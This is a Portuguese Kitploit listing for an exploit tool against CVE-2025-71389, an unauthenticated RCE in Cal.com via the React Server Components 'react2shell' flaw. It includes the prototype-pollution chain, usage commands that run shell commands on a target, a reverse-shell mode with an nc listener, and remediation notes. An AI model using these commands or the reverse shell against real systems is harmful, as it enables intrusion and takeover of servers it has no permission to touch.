Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-71389_exploit | Kitploit
Ferramentas/GitHubGitHub/0xdak/cve-2025-71389_exploit
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHub0xdak/cve-2025-71389_exploit

CVE-2025-71389_exploit

Ver Repositório
há 24 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-71389 — Cal.com RCE não autenticado (react2shell)

Execução remota de código sem autenticação no Cal.com <= 5.9.8 através da falha de desserialização "Flight" do React Server Components — "react2shell" (CVE-2025-55182 no React, CVE-2025-66478 no Next.js).

O Cal.com inclui um Next.js 15.x vulnerável. Um único POST / não autenticado, contendo um cabeçalho Next-Action e um payload Flight multipart elaborado, percorre uma cadeia de poluição de protótipo (__proto__:then + constructor:constructor) até um eval no lado do servidor, alcançando child_process.execSync. A saída do comando é retornada inline no campo digest do erro RSC. Sem autenticação, sem interação do usuário — uma única requisição é RCE.

  • Afetado: Cal.com <= 5.9.8 (Next.js 15.x / 16.x App Router com RSC)
  • Corrigido em: Cal.com 5.9.9 (atualiza o Next.js incluído)
  • Porta padrão: 3000
  • CWE: 502 / 94
  • Subjacente: CVE-2025-55182 (React), CVE-2025-66478 (Next.js)

Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
# one-off command (output comes back in the response)
python3 exploit.py http://10.10.10.10:3000/ -c 'id'
python3 exploit.py http://10.10.10.10:3000/ -c 'cat /root/proof.txt'

# interactive reverse shell (start `nc -lvnp 4444` first)
python3 exploit.py http://10.10.10.10:3000/ --shell 10.10.14.5:4444

O comando único retorna a sua saída inline através do digest do erro RSC. O modo --shell dispara uma reverse shell bash /dev/tcp destacada com setsid (o contêiner do alvo é Debian e inclui bash).

Remediação

Atualize o Cal.com para >= 5.9.9 (qualquer Next.js corrigido: 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7). Não exponha o manipulador de funções de servidor do RSC a clientes não confiáveis e não execute o contêiner do aplicativo como root.

Aviso legal

Apenas para testes de segurança autorizados e fins educacionais. Use-o somente em sistemas que você possui ou para os quais tenha permissão explícita de teste.

Baixar ferramenta